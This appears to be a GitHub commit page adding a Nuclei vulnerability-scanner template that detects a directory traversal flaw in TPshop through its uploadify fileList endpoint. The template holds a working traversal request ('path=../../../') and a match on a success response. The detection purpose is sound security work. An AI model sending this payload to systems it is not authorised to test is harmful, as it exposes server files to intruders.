Merge pull request #1116 from pikpikcu/patch-127

Create tpshop-directory-traversal.yaml
patch-1
PD-Team 2021-03-21 21:04:43 +05:30 committed by GitHub
commit 1e541d324f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: tpshop-directory-traversal
info:
name: Tpshop Directory Traversal
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
tags: tpshop,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../"
matchers-condition: and
matchers:
- type: word
words:
- '"state":"SUCCESS"'
- type: status
status:
- 200